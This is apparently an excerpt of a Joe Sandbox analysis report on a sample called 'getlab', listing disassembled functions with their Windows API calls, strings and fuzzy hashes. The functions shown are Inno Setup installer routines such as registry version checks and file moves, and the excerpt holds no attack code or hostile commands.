                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$NameOpenResourceUniversal
                                                                          • String ID: Z
                                                                          • API String ID: 3604996873-1505515367
                                                                          • Opcode ID: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                                          • Instruction ID: 6c201072c7e19ab920663406aa1001a3a7646b20d706545eb94c2f0a958ae389
                                                                          • Opcode Fuzzy Hash: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                                          • Instruction Fuzzy Hash: 17517070E04208ABDB11DF55C941A9EBBF9EF49304F1481BAE500BB3D1D778AE458B6A
                                                                          Function 0044CFB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetRectEmpty.USER32(?), ref: 0044D046
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D071
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D0F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$EmptyRect
                                                                          • String ID:
                                                                          • API String ID: 182455014-2867612384
                                                                          • Opcode ID: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                                          • Instruction ID: 2c01bf535b7fc2f64207dbeae616ffe24efc4250a83762b1f7dac36c1304b9fc
                                                                          • Opcode Fuzzy Hash: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                                          • Instruction Fuzzy Hash: 6C517171E00248AFDB11DFA9C885BDEBBF8AF49308F14447AE845EB352D7389945CB64
                                                                          Function 0042EF6C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EF96
                                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                          • SelectObject.GDI32(?,00000000), ref: 0042EFB9
                                                                          • 73A1A480.USER32(00000000,?,0042F0A5,00000000,0042F09E,?,00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000), ref: 0042F098
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570CreateFontIndirectObjectSelect
                                                                          • String ID: ...\
                                                                          • API String ID: 2998766281-983595016
                                                                          • Opcode ID: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                                          • Instruction ID: 43f07ddd406d3cd78f52d868909731211d08e22d210600ca561f601472f043fe
                                                                          • Opcode Fuzzy Hash: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                                          • Instruction Fuzzy Hash: A6318570B00128ABDB11DF99D841BAEB7F9FB48708F90447BF410A7392C7785E44CA59
                                                                          Function 00416408 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                                          • UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                                          • RegisterClassA.USER32(?), ref: 004164C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoRegisterUnregister
                                                                          • String ID: @
                                                                          • API String ID: 3749476976-2766056989
                                                                          • Opcode ID: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                                          • Instruction ID: 9d11af1acff112dbe95f15f3a9399eab9f365f4a7252c57533c35fba51c14aa0
                                                                          • Opcode Fuzzy Hash: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                                          • Instruction Fuzzy Hash: 81316F702043409BD720EF68C981B9B77E5AB89308F04457FF949DB392DB39D944CB6A
                                                                          Function 0049771C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 0049778C
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 004977B5
                                                                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004977CE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$Attributes$Move
                                                                          • String ID: isRS-%.3u.tmp
                                                                          • API String ID: 3839737484-3657609586
                                                                          • Opcode ID: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                                          • Instruction ID: cfa846df06bac921d3cc7342383d8013e9ea743293dbac669405f5124aadd281
                                                                          • Opcode Fuzzy Hash: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                                          • Instruction Fuzzy Hash: 05213271E14209AFCF00EBA9C8859AFBBB8AF54314F51457AB414B72D1D6385E01CB59
                                                                          Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                          • ExitProcess.KERNEL32 ref: 00404E0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1220098344-2970929446
                                                                          • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                          • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                          • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                          • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                          Function 00456A1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A70
                                                                          • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456A9D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                          • String ID: LoadTypeLib$RegisterTypeLib
                                                                          • API String ID: 1312246647-2435364021
                                                                          • Opcode ID: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                                          • Instruction ID: dea98cbdfb45d66fad0868bd7db80167fcb8ebb816cd54e6ac056e4ed8ccdf78
                                                                          • Opcode Fuzzy Hash: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                                          • Instruction Fuzzy Hash: A9119670B00604BFDB11DFA6CD51A5EB7BDEB8A705F518476BC04E3652DA389D04CA54
                                                                          Function 00456F74 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456F8E
                                                                          • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045702B
                                                                          Strings
                                                                          • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FBA
                                                                          • Failed to create DebugClientWnd, xrefs: 00456FF4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                          • API String ID: 3850602802-3720027226
                                                                          • Opcode ID: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                                          • Instruction ID: 364b6cfc2dd25a83f1288abab6954b7d1953a24f55fd1dbca2d44010d5bb0a44
                                                                          • Opcode Fuzzy Hash: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                                          • Instruction Fuzzy Hash: 6D110471604240ABD310AB689C81B5F7BD49B15319F55403EFA849B3C3D3794C08C7BE
                                                                          Function 00478180 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                          • GetFocus.USER32 ref: 004781EB
                                                                          • GetKeyState.USER32(0000007A), ref: 004781FD
                                                                          • WaitMessage.USER32(?,00000000,00478224,?,00000000,0047824B,?,?,00000001,00000000,?,?,?,0047FA10,00000000,004808CA), ref: 00478207
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FocusMessageStateTextWaitWindow
                                                                          • String ID: Wnd=$%x
                                                                          • API String ID: 1381870634-2927251529
                                                                          • Opcode ID: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                                          • Instruction ID: 5f1c8258d991fabeb8ce52e8cfeede19b84d8dc0ceec509adeab196e5a3e054a
                                                                          • Opcode Fuzzy Hash: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                                          • Instruction Fuzzy Hash: C011C430644645AFC700FBA5D845A9E7BF8EB49304B5184BEF408E7651DB386D00CA69
                                                                          Function 0046E430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E438
                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E447
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$LocalSystem
                                                                          • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                          • API String ID: 1748579591-1013271723
                                                                          • Opcode ID: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                                          • Instruction ID: 72319f5cb05664b7e116556de8a44c1f4f08e856cbf185e3f572017f7e9d6813
                                                                          • Opcode Fuzzy Hash: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                                          • Instruction Fuzzy Hash: 3011F8A440C3919ED340DF6AC44432BBAE4AB99708F04896FF9C8D6381E779C948DB77
                                                                          Function 00453F4A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F57
                                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F7C
                                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesDeleteErrorLastMove
                                                                          • String ID: DeleteFile$MoveFile
                                                                          • API String ID: 3024442154-139070271
                                                                          • Opcode ID: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                                          • Instruction ID: d61ccdf94e8101ca60a50ffa5b16d74e098655775539a7d8992e0f9997158dc0
                                                                          • Opcode Fuzzy Hash: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                                          • Instruction Fuzzy Hash: E6F062716041045BD701EBA2D94266EA3ECEB8430EFA0403BB900BB6C3DA3C9E09452D
                                                                          Function 00459184 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                          • API String ID: 47109696-2631785700
                                                                          • Opcode ID: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                                          • Instruction ID: b3b7ca93e3ee9f71f5f4917cf459f66c0bdee831e94fc7924cf2246e82346dcf
                                                                          • Opcode Fuzzy Hash: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                                          • Instruction Fuzzy Hash: 11F0A431300151EBD710EB5AD895B5E7698DB95356F50453BF940CB253C67CCC058B59
                                                                          Function 00483180 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831C1
                                                                          • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831E4
                                                                          Strings
                                                                          • CSDVersion, xrefs: 004831B8
                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0048318E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                          • API String ID: 3677997916-1910633163
                                                                          • Opcode ID: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                                          • Instruction ID: 86ea9b687bc925f919ffd8904499e524e0617f710df10bb4bfec30536caacf1e
                                                                          • Opcode Fuzzy Hash: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                                          • Instruction Fuzzy Hash: 84F03175E40208A6DF10EAE18C49BAF73BCAB04F05F104567E910E7281EB7AAB048B59
                                                                          Function 0042D8E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B2E,00000000,00453BD1,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FC1,00000000), ref: 0042D902
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D908
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                          • API String ID: 1646373207-4063490227
                                                                          • Opcode ID: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                                          • Instruction ID: 46d83308b3a0af851ef73fb55c1ff88b015d3a0f0a3b668622d7e336d39da5d8
                                                                          • Opcode Fuzzy Hash: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                                          • Instruction Fuzzy Hash: F2E0DFE0B00B4122D720257A1C82B5B10894B84768FA0043B3888E52D6EDBCDD841A2D
                                                                          Function 0042EB4C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAC8), ref: 0042EB5A
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                          • API String ID: 1646373207-260599015
                                                                          • Opcode ID: 3e5cb9d7abe0ff9b6486504588ced90e5b8f05a967361d48d4fc2df467991dfe
                                                                          • Instruction ID: e22649ab5c5d02c0682c512352339c2c95c689ad11c13297e1ab925b23cbcb3c
                                                                          • Opcode Fuzzy Hash: 3e5cb9d7abe0ff9b6486504588ced90e5b8f05a967361d48d4fc2df467991dfe
                                                                          • Instruction Fuzzy Hash: B8D0C793711732566910B5FB3CD1DEB098C895427A39400B7F615E5541D55DDC1119AC
                                                                          Function 0044F73C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
